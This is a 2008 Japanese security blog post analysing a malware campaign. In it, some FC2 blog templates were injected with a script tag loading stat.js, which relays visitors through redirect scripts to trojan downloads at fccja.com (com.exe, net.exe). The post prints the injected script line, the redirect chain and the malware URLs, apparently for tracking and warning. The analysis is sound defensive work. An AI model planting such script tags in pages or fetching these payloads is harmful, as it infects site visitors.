ハルコタン紀行

fccja.comその4

いくつかのFC2ブログのテンプレートに新たなscriptが仕込まれています。
<script src="http://*.web.fc2.com/stat.js"></script>
個人のホームページのため「*」は伏せ字です。

今までは

*.blog*.fc2.com(注入)→fccja.com

となっていたのが

*.blog*.fc2.com(注入)→*.web.fc2.com(注入)→fccja.com

となっており、FC2ホームページを中継することでブログ管理者などが見逃しやすくなっています。
fc2.comのscriptとしてはFCカウンターやFC2アクセス解析などもありますので、慎重に確認したほうがよさそうです。

ついでに今後のためにエンコードしておきますね。
web.fc2.com
%77%65%62%2E%66%63%32%2E%63%6F%6D

fccja.comも更新されています。

e.js
→a.js

a.js
→a1.asp?r=http%3A//www.fccja.com/e.js (スクリプトその1)
→a2.asp?r=http%3A//www.fccja.com/e.js (スクリプトその2)
→a3.asp?r=http%3A//www.fccja.com/e.js (スクリプトその3)

*.web.fc2.com/stat.js
→b.js
2008033006.png
b.js
→b1.asp?r=http%3A//*.web.fc2.com/stat.js (スクリプトその1)
→b2.asp?r=http%3A//*.web.fc2.com/stat.js (スクリプトその2)
→b3.asp?r=http%3A//*.web.fc2.com/stat.js (スクリプトその3)

document.referrerではなくHTTP_REFERERをこっそり見たほうがいいと思いますが、
実はリファラなど見ておらず、rに何かを入れればいいようです。
a1.asp?r=fuck (スクリプトその1)

トロイ本体も更新されています。

a.js
http://www.fccja.com/com.exe
VirusTotal

26日にはPackerを使っていましたが、23日のものに戻っています。
怪しげなPackerを使うといくつかのアンチウイルスに即ウイルス扱いされてしまうためかもしれません。
23日の記事と見比べると1週間前には対応していなかったアンチウイルスベンダのその後がわかります。

b.js
http://www.fccja.com/net.exe
VirusTotal

こちらは今朝できたばかりです(スクリプトは昨夜からありました)。

b.jsの存在までは確認していましたが、その前がわかりませんでした。
情報を提供していただけた「おおきくなりません」に感謝いたします。

メモ:
自分でブログを作るより効果的なので他のブログに仕込むのはわかります。
しかし中継用にiframeやscriptでしか飛ばないのならvirus.web.fc2.comなどを作ってもいい気もしますが、
FC2IDの新規登録が難しいんでしょうか?

テーマ:セキュリティ - ジャンル:コンピュータ

  1. 2008/03/30(日) 16:13:22|
  2. ウイルス
  3. | トラックバック:0
  4. | コメント:1
<<fccja.comその5 | ホーム | 「伝える言葉」>>

コメント

管理人のみ閲覧できます

このコメントは管理人のみ閲覧できます
  1. 2008/03/30(日) 19:38:43 |
  2. |
  3. #
  4. [ 編集 ]

コメントの投稿


管理者にだけ表示を許可する

トラックバック

トラックバック URL
http://ilion.blog47.fc2.com/tb.php/17-9b51e964
この記事にトラックバックする(FC2ブログユーザー)